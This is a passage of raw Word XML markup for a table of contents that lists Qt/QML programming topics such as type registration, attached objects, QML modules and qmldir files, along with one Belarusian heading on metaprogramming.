            <w:i/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>Метапраграмаванне ў кт і яго перавагі</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605160 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</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61" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Registering Non-Instantiable Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605161 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</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62" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Registering Singleton Objects with a Singleton Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605162 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50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63" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Type Revisions and Versions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605163 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</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64" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Registering Extension Objects</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605164 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53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65" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining QML-Specific Types and Attributes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605165 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</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66" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Providing Attached Objects for Data Annotations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605166 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</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67" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Steps for Implementing Attached Objects</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605167 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>55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68" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Implementing Attached Objects: An Example</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605168 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>55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69" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property Modifier Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605169 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>57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70" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property Value Sources</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605170 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>58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71" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Specifying Default Properties for QML Object Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605171 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>60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72" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining Visual Items with the Qt Quick Module</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605172 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>60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73" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Receiving Notifications for Object Initialization</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605173 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>61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174" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Modules</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605174 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>61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75" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining a QML Module</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605175 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>62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76" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Supported QML Module Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605176 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>62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77" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Providing Types and Functionality in a C++ Plugin</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605177 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>62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78" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Module Definition qmldir Files</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605178 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>63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79" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Contents of a Module Definition qmldir File</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605179 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>63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80" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Versioning Semantics</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605180 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>66</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81" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Example of a</w:t>
        </w:r>
        <w:bookmarkStart w:id="0" w:name="_GoBack"/>
        <w:bookmarkEnd w:id="0"/>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> qmldir File</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605181 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>67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82" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Writing a qmltypes File</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605182 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>68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83" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Identified Modules</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605183 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>71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84" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Locally Installed Identified Modules</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605184 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>71</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="61"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605185" w:history="1">
